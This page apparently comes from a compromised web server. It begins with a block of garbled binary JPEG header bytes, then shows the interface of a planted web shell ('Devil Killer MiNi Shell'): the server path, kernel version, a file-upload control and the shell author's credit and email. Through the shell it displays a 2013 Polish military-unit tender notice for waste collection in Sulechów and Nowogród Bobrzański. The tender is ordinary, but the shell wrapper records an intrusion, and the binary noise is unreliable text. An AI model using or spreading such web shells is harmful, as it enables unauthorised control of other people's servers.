JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130624/241430-N-2013.html

<p class="kh_header"><b>Krosno Odrzańskie: PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ PONIŻEJ KWOT OKREŚLONYCH W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY PZP NA  USŁUGĘ WYWOZU NIECZYSTOŚCI STAŁYCH ORAZ PRZEKAZANIE ICH DO SKŁADOWANIA I UTYLIZACJI Z TERENU ADMINISTROWANEGO PRZEZ JW. 5286 Z MIEJSCOWOŚCI:
SULECHÓW I NOWOGRÓD BOBRZAŃSKI
SPRAWA 74/PN/2013</b><br>
<b>Numer ogłoszenia: 241430 - 2013; data zamieszczenia: 24.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5286 , ul. Piastów 7, 66-600 Krosno Odrzańskie, woj. lubuskie, tel. 68 3672 404, faks 68 3672 556.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa Budzetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ PONIŻEJ KWOT OKREŚLONYCH W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY PZP NA  USŁUGĘ WYWOZU NIECZYSTOŚCI STAŁYCH ORAZ PRZEKAZANIE ICH DO SKŁADOWANIA I UTYLIZACJI Z TERENU ADMINISTROWANEGO PRZEZ JW. 5286 Z MIEJSCOWOŚCI:
SULECHÓW I NOWOGRÓD BOBRZAŃSKI
SPRAWA 74/PN/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający podzielił przedmiot zamówienia na dwie części
Część 1 - Wywóz nieczystości z m. Sulechów
Część 2 - Wywóz nieczystości z m. Nowogród Bobrzański
Przedmiotem zamówienia jest usługa wywozu odpadów stałych.
Przedmiot zamówienia obejmuje dostarczenie na wyznaczone miejsce zamówionej ilości pojemników na odpady (szczegółowy opis zawiera formularz ofertowy), uzgodnienie z Zamawiającym miejsca ich ustawienia, załadunek, transport i unieszkodliwianie odpadów na składowisko odpadów o uregulowanym stanie prawnym, z zachowaniem powszechnie obowiązujących przepisów wraz ze wszystkimi zmianami i rozporządzeniami, w szczególności z ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska, wywóz odpadów specjalistycznym sprzętem, w pojemnikach zabezpieczonych przed wydostaniem się ich na zewnątrz,
wywożenie odpadów z częstotliwością podaną w formularzach cenowych, a w razie potrzeby po telefonicznym zgłoszeniu przez Kierownika właściwego SOI, w terminie 24 godzin od zgłoszenia, 
wymiana pojemników dostarczonych przez Wykonawcę, w przypadku zużycia w wyniku eksploatacji, na jego koszt,
wymiana pojemników na koszt Zamawiającego będzie odbywać się tylko gdy uległy one umyślnemu uszkodzeniu lub zaginięciu z jego winy,
ezynfekcja pojemników będących własnością wykonawcy  1 raz w ciągu trwania umowy  w terminie uzgodnionym z Kierownikiem właściwego SOI
wywóz nieczystości zgromadzonych luzem oraz gabarytowych na zgłoszenie telefoniczne w ciągu 24 godzin od zgłoszenia wraz z ich załadunkiem i uprzątnięciem miejsca składowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy, dotyczące:
1).	Posiadania uprawnień do wykonywania  określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania 
2).	Posiadania wiedzy i doświadczenia.
3).	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4).	Sytuacji ekonomicznej i finansowej.
Warunek ten zostanie spełniony, jeżeli Wykonawca oświadczy, że spełnienia warunki określone w  art. 22 ust. 1 ustawy Prawo zamówień publicznych.



2) W zakresie posiadania uprawnień do wykonywania  określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania 

a) Warunek ten zostanie spełniony, jeżeli Wykonawca złoży aktualne wymagane prawem zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych wydane przez organ właściwy ze względu na miejsce świadczenia przedmiotowej usługi (zgodnie z ustawą o utrzymaniu czystości i porządku w gminach z dnia 13.09.1996r. - Dz. U. 2012 poz. 391 ze zm.)
dla Części 1 gmina Sulechów
dla Części 2 gmina Nowogród Bobrzański

b) Warunek ten zostanie spełniony, jeżeli Wykonawca złoży aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów będących przedmiotem zamówienia wydane na podstawie art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. o odpadach (tj. Dz. U. 2013 r., poz.21)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4)	Formularz ofertowy - załącznik nr 3 do SIWZ.
5)	Oświadczenie w przedmiocie wskazania usług powierzonych podwykonawcom załącznik nr 4.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie trwania umowy dopuszcza się wprowadzenie następujących zmian do jej treści:
1)	danych dotyczących stron umowy, jak zmiana nazwy, siedziby, adresu, numeru konta bankowego, osób upoważnionych jako przedstawiciele stron, itp.,
2)	zmiany stawki VAT dotyczącej rodzaju usługi określonej w przedmiocie umowy z    chwilą wejścia w życie przepisów ogłoszonych przez właściwego ministra.

Wszystkie wprowadzone zmiany mogą być dokonane tylko w odpowiednim zakresie,  który wynika z okoliczności powodującej konieczność wprowadzenia zmian do umowy.  

Projekt  umowy  stanowi  załącznik  nr 6 do  SIWZ . 
Jeżeli Zamawiający dokona wyboru oferty, umowa w sprawie realizacji zamówienia publicznego zostanie zawarta z wykonawcą, który spełni wszystkie przedstawione wymagania i którego oferta okaże się najkorzystniejsza.
Zamawiający zastrzega sobie prawo zawarcia umowy, której treść wykonawcy otrzymują jako załącznik do niniejszej SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5286
ul. Obrońców Stalingradu 10 
66 - 600 Krosno Odrzańskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2013 godzina 11:00, miejsce: Jednostka Wojskowa 5286
ul. Obrońców Stalingradu 10 
66 - 600 Krosno Odrzańskie 
Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ PONIŻEJ KWOT OKREŚLONYCH W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY PZP NA  USŁUGĘ WYWOZU NIECZYSTOŚCI STAŁYCH ORAZ PRZEKAZANIE ICH DO SKŁADOWANIA I UTYLIZACJI Z TERENU ADMINISTROWANEGO PRZEZ JW. 5286 Z MIEJSCOWOŚCI:
SULECHÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - Wywóz nieczystości z m. Sulechów
Przedmiotem zamówienia jest usługa wywozu odpadów stałych.
Przedmiot zamówienia obejmuje dostarczenie na wyznaczone miejsce zamówionej ilości pojemników na odpady (szczegółowy opis zawiera formularz ofertowy), uzgodnienie z Zamawiającym miejsca ich ustawienia, załadunek, transport i unieszkodliwianie odpadów na składowisko odpadów o uregulowanym stanie prawnym, z zachowaniem powszechnie obowiązujących przepisów wraz ze wszystkimi zmianami i rozporządzeniami, w szczególności z ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska, wywóz odpadów specjalistycznym sprzętem, w pojemnikach zabezpieczonych przed wydostaniem się ich na zewnątrz,
wywożenie odpadów z częstotliwością podaną w formularzach cenowych, a w razie potrzeby po telefonicznym zgłoszeniu przez Kierownika właściwego SOI, w terminie 24 godzin od zgłoszenia, 
wymiana pojemników dostarczonych przez Wykonawcę, w przypadku zużycia w wyniku eksploatacji, na jego koszt,
wymiana pojemników na koszt Zamawiającego będzie odbywać się tylko gdy uległy one umyślnemu uszkodzeniu lub zaginięciu z jego winy,
dezynfekcja pojemników będących własnością wykonawcy  1 raz w ciągu trwania umowy  w terminie uzgodnionym z Kierownikiem właściwego SOI
wywóz nieczystości zgromadzonych luzem oraz gabarytowych na zgłoszenie telefoniczne w ciągu 24 godzin od zgłoszenia wraz z ich załadunkiem i uprzątnięciem miejsca składowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ PONIŻEJ KWOT OKREŚLONYCH W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY PZP NA  USŁUGĘ WYWOZU NIECZYSTOŚCI STAŁYCH ORAZ PRZEKAZANIE ICH DO SKŁADOWANIA I UTYLIZACJI Z TERENU ADMINISTROWANEGO PRZEZ JW. 5286 Z MIEJSCOWOŚCI:
NOWOGRÓD BOBRZAŃSKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Wywóz nieczystości z m. Nowogród Bobrzański
Przedmiotem zamówienia jest usługa wywozu odpadów stałych.
Przedmiot zamówienia obejmuje dostarczenie na wyznaczone miejsce zamówionej ilości pojemników na odpady (szczegółowy opis zawiera formularz ofertowy), uzgodnienie z Zamawiającym miejsca ich ustawienia, załadunek, transport i unieszkodliwianie odpadów na składowisko odpadów o uregulowanym stanie prawnym, z zachowaniem powszechnie obowiązujących przepisów wraz ze wszystkimi zmianami i rozporządzeniami, w szczególności z ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska, wywóz odpadów specjalistycznym sprzętem, w pojemnikach zabezpieczonych przed wydostaniem się ich na zewnątrz,
wywożenie odpadów z częstotliwością podaną w formularzach cenowych, a w razie potrzeby po telefonicznym zgłoszeniu przez Kierownika właściwego SOI, w terminie 24 godzin od zgłoszenia, 
wymiana pojemników dostarczonych przez Wykonawcę, w przypadku zużycia w wyniku eksploatacji, na jego koszt,
wymiana pojemników na koszt Zamawiającego będzie odbywać się tylko gdy uległy one umyślnemu uszkodzeniu lub zaginięciu z jego winy,
dezynfekcja pojemników będących własnością wykonawcy  1 raz w ciągu trwania umowy  w terminie uzgodnionym z Kierownikiem właściwego SOI wywóz nieczystości zgromadzonych luzem oraz gabarytowych na zgłoszenie telefoniczne w ciągu 24 godzin od zgłoszenia wraz z ich załadunkiem i uprzątnięciem miejsca składowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com